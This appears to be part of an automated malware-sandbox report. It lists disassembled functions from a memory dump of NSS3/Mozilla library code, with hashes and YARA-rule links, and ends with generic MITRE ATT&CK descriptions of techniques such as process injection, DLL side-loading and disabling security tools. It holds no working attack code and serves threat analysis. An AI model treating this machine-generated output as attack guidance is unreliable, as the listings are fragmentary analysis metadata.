Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: 64e2e8ceb3155c5cfa41557f7f831e37f21b5ac00d5a9b0d1224ef1db1015eae
Instruction ID: 67e93290d0da4a695d864252a5667385cefc511fc068845cfad9d38a4adafd00
Opcode Fuzzy Hash: 64e2e8ceb3155c5cfa41557f7f831e37f21b5ac00d5a9b0d1224ef1db1015eae
Instruction Fuzzy Hash: F6F049B260220057FF101F199C41B673258EF81788F150636DF3C8BF00D720E48482E1

Function 6CAC88E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,6CAD08AA,?), ref: 6CAC88F6
EnterCriticalSection.KERNEL32(?,?,?,?,6CAD08AA,?), ref: 6CAC890B
PR_NotifyCondVar.NSS3(?,?,?,?,?,6CAD08AA,?), ref: 6CAC8936
PR_Unlock.NSS3(?,?,?,?,?,6CAD08AA,?), ref: 6CAC8940

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CondCriticalEnterNotifySectionUnlockValue
String ID:
API String ID: 959714679-0
Opcode ID: 7cd15347b282ac5e311c62f68a1d76e040fc126eeaf6f29e3ca37393e9971d7e
Instruction ID: ce3e437b864754e63ec5e4acf2b1b287751ab9943941c9d1ea3cfc1e96f3fc45
Opcode Fuzzy Hash: 7cd15347b282ac5e311c62f68a1d76e040fc126eeaf6f29e3ca37393e9971d7e
Instruction Fuzzy Hash: E3014075B056059BDB00AFB9D484659B7F4FF06398F054A2AD89887B00E730E5E4CBD3

Function 6CB1AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6CB05D40,00000000,?,?,6CAF6AC6,6CB0639C), ref: 6CB1AC2D

Part of subcall function 6CABADC0: TlsGetValue.KERNEL32(?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE10
Part of subcall function 6CABADC0: EnterCriticalSection.KERNEL32(?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE24
Part of subcall function 6CABADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CA9D079,00000000,00000001), ref: 6CABAE5A
Part of subcall function 6CABADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE6F
Part of subcall function 6CABADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE7F
Part of subcall function 6CABADC0: TlsGetValue.KERNEL32(?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAEB1
Part of subcall function 6CABADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAEC9

PK11_FreeSymKey.NSS3(?,6CB05D40,00000000,?,?,6CAF6AC6,6CB0639C), ref: 6CB1AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CB05D40,00000000,?,?,6CAF6AC6,6CB0639C), ref: 6CB1AC59
free.MOZGLUE(8CB6FF01,6CAF6AC6,6CB0639C,?,?,?,?,?,?,?,?,?,6CB05D40,00000000,?,6CB0AAD4), ref: 6CB1AC62

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 0a92bf010da95e3d144944de30956bfd19c63cd1748343577ec3556d82a79a86
Instruction ID: 7e90145413b1a61e38cf28d7b4e947fec6a63574795b2e0079fa2f21c81b7f4a
Opcode Fuzzy Hash: 0a92bf010da95e3d144944de30956bfd19c63cd1748343577ec3556d82a79a86
Instruction Fuzzy Hash: 180128B56042049BDB00DF15EDC0B56BBA8EF44B58F188468E9499FB06E731F948CBA2

Function 6CB00840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CBD2F88,6CB00660,00000020,00000000,?,?,6CB02C3D,?,00000000,00000000,?,6CB02A28,00000060,00000001), ref: 6CB00860

Part of subcall function 6C9F4C70: TlsGetValue.KERNEL32(?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4C97
Part of subcall function 6C9F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4CB0
Part of subcall function 6C9F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,6CB02C3D,?,00000000,00000000,?,6CB02A28,00000060,00000001), ref: 6CB00874
EnterCriticalSection.KERNEL32(00000001), ref: 6CB00884
PR_Unlock.NSS3 ref: 6CB008A3

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: 7436bc7984014e9903d327a0d132501fd9c0e566ead71902e7b530e4cf0792ad
Instruction ID: 1a2905852e63fb47b6167cf238803632d726c825b756c8f1c31874bba29b22a1
Opcode Fuzzy Hash: 7436bc7984014e9903d327a0d132501fd9c0e566ead71902e7b530e4cf0792ad
Instruction Fuzzy Hash: 4D01F775B043C46BEB012F65FC45A5A7F38FB6632AF080565EC1853A02EB21A89487E3

Function 6CACFD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA79003,?), ref: 6CACFD91

Part of subcall function 6CAD0BE0: malloc.MOZGLUE(6CAC8D2D,?,00000000,?), ref: 6CAD0BF8
Part of subcall function 6CAD0BE0: TlsGetValue.KERNEL32(6CAC8D2D,?,00000000,?), ref: 6CAD0C15

PORT_Alloc_Util.NSS3(A4686CAD,?), ref: 6CACFDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686CAD,?,?), ref: 6CACFDC4
free.MOZGLUE(00000000,?,?), ref: 6CACFDD1

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: f5e610d9991cc80e405fedd1ead82abf5256a20b838140df4a122d4d00ae9821
Instruction ID: 52074d1b55c864a095787c384ccfc54ad90d01ea65dcc718d8bfe04b76cd1e74
Opcode Fuzzy Hash: f5e610d9991cc80e405fedd1ead82abf5256a20b838140df4a122d4d00ae9821
Instruction Fuzzy Hash: 09F0C8B57022425BEB054B55DC8091B7758EF5479DB148078ED198FB01E721E855C7F2

Function 6CB8CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6CB8CC61
free.MOZGLUE ref: 6CB8CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6CB8CC80
free.MOZGLUE(?), ref: 6CB8CC87

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 89aeac8064bfdb91dae4cf6958b1bb90b49550c5bdadd93367ccb1bb2428f273
Instruction ID: f3081329df80a0c4ba42845c0bbd5220ade595c94c187b5a508b6d10605ab9a3
Opcode Fuzzy Hash: 89aeac8064bfdb91dae4cf6958b1bb90b49550c5bdadd93367ccb1bb2428f273
Instruction Fuzzy Hash: 53E030767006089BCA10EFA9DC4888677ACEE5D2703150525E691C3700D232F905CBA1

Function 6CA69DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6CA69E1F

Part of subcall function 6CA213C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C9F2352,?,00000000,?,?), ref: 6CA21413
Part of subcall function 6CA213C0: memcpy.VCRUNTIME140(00000000,6C9F2352,00000002,?,?,?,?,6C9F2352,?,00000000,?,?), ref: 6CA214C0

Strings

ESCAPE expression must be a single character, xrefs: 6CA69F78
LIKE or GLOB pattern too complex, xrefs: 6CA6A006

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: d7730ccceea5ba0be4c7dc0fc4766b44ea494be8f1da7ec7434b2c0ba254aed7
Instruction ID: cc9bc2d2f9961ce54105a01f39fb576e9994a2f042d096ef90a4989016e0d52a
Opcode Fuzzy Hash: d7730ccceea5ba0be4c7dc0fc4766b44ea494be8f1da7ec7434b2c0ba254aed7
Instruction Fuzzy Hash: 39811C70A043558BDB00CF3AC2803A9B7F2AF45318F2D8659D8A58BF85D736D8C6C791

Function 6CAC4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAC4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CAC4DE6

Strings

%d.%d, xrefs: 6CAC4DDE

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 3b7cb6b6ceb0b0d70a5e4a97d77eb79949ea37f5f0013107b20b3fea2290f9c3
Instruction ID: aa88a5af42ce8e4d3c1a38050046f262f0bdfd7bbe812f14f74234ed4419b64e
Opcode Fuzzy Hash: 3b7cb6b6ceb0b0d70a5e4a97d77eb79949ea37f5f0013107b20b3fea2290f9c3
Instruction Fuzzy Hash: EC3129B2E042586BEB10ABA09C05BFF776CEF44308F050469ED559B781EB309949CBE6

Function 6CB0AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6CB0AF78

Part of subcall function 6CA6ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA6ACE2
Part of subcall function 6CA6ACC0: malloc.MOZGLUE(00000001), ref: 6CA6ACEC
Part of subcall function 6CA6ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA6AD02
Part of subcall function 6CA6ACC0: TlsGetValue.KERNEL32 ref: 6CA6AD3C
Part of subcall function 6CA6ACC0: calloc.MOZGLUE(00000001,?), ref: 6CA6AD8C
Part of subcall function 6CA6ACC0: PR_Unlock.NSS3 ref: 6CA6ADC0
Part of subcall function 6CA6ACC0: PR_Unlock.NSS3 ref: 6CA6AE8C
Part of subcall function 6CA6ACC0: free.MOZGLUE(?), ref: 6CA6AEAB

memcpy.VCRUNTIME140(6CBD3084,6CBD02AC,00000090), ref: 6CB0AF94

Strings

SSL, xrefs: 6CB0AF73

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: ea9a47ff4d81cfbcb4eb9d09e4b71c77ff64de24fd091d94133792c12983eb67
Instruction ID: 60b6212d713b3a19266d10badb4769f3b80c1b4741081e614a70007b87f6d9e5
Opcode Fuzzy Hash: ea9a47ff4d81cfbcb4eb9d09e4b71c77ff64de24fd091d94133792c12983eb67
Instruction Fuzzy Hash: BC215BB6306AC89ECB00EF51A52373A7F79B3027587549119C1194BF27D731A1489FE6

Function 6CA60F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000,?,6C9F204A), ref: 6CA60F1B

Part of subcall function 6CA61370: GetSystemInfo.KERNEL32(?,?,?,?,6CA60936,?,6CA60F20,6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000), ref: 6CA6138F

PR_NewLogModule.NSS3(clock,6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000,?,6C9F204A), ref: 6CA60F25

Part of subcall function 6CA61110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6CA60936,00000001,00000040), ref: 6CA61130
Part of subcall function 6CA61110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA60936,00000001,00000040), ref: 6CA61142
Part of subcall function 6CA61110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA60936,00000001), ref: 6CA61167

Strings

clock, xrefs: 6CA60F20

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 26749307eaef9c830269ff24584272831029d56111f8e731aca3cceaa58858a5
Instruction ID: 09eea6b00f592f41ec0df4c9284ef5b237b843f403d606d07a6dd376222f1311
Opcode Fuzzy Hash: 26749307eaef9c830269ff24584272831029d56111f8e731aca3cceaa58858a5
Instruction Fuzzy Hash: 38D0123560418455C91266979C45BB6BAACC7C3279F104826E24D83D104A6564EFD66A

Function 6CAD0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6CAD0DF5
TlsGetValue.KERNEL32 ref: 6CAD0E2D
TlsGetValue.KERNEL32 ref: 6CAD0E58
TlsGetValue.KERNEL32 ref: 6CAD0E84

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 38f38df9a71cf481f9182c44edfbc25c221689be5571612f57102edad9691875
Instruction ID: e09deccc09f879d6634d0b5feb768e22429b124ca5e664663e4512cb94c058b1
Opcode Fuzzy Hash: 38f38df9a71cf481f9182c44edfbc25c221689be5571612f57102edad9691875
Instruction Fuzzy Hash: DD31C470A457868FDB00AF39C5842597BB4FF0A708F06466DD888C7A11EF34E5C5CB82

Function 6CAD0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CA72AF5,?,?,?,?,?,6CA70A1B,00000000), ref: 6CAD0F1A
malloc.MOZGLUE(00000001), ref: 6CAD0F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CAD0F42
TlsGetValue.KERNEL32 ref: 6CAD0F5B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 3b4cd8f2f9111039e363b5908b17e049969cc51faa358332f9e812bf00318c4f
Instruction ID: 5944a290724b5a752e6258def5e2be9aa65e5e3daff9e8f15968166e1ac18576
Opcode Fuzzy Hash: 3b4cd8f2f9111039e363b5908b17e049969cc51faa358332f9e812bf00318c4f
Instruction Fuzzy Hash: 0401FCB1E012D05BEB102B3E9E045567BACEF5A259F160135EC1DC3A21E731E9D9C6E3

Function 6CA81EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6CA81ECE
free.MOZGLUE(?), ref: 6CA81EDF
free.MOZGLUE(?), ref: 6CA81EEF
free.MOZGLUE(?), ref: 6CA81EF5

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d2eea0da4734d19d677adb3445c32eb423c843746e990ce3ca5e0929f6a3c246
Instruction ID: 5e86ae77c64f278e497036aa391524c881594dbf83b78792013cd6caf7408ef8
Opcode Fuzzy Hash: d2eea0da4734d19d677adb3445c32eb423c843746e990ce3ca5e0929f6a3c246
Instruction Fuzzy Hash: 7BF0B4B17011016BEB00AB6ADC89D37737CEF45594B080425FD29C3A00D726F55186B1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
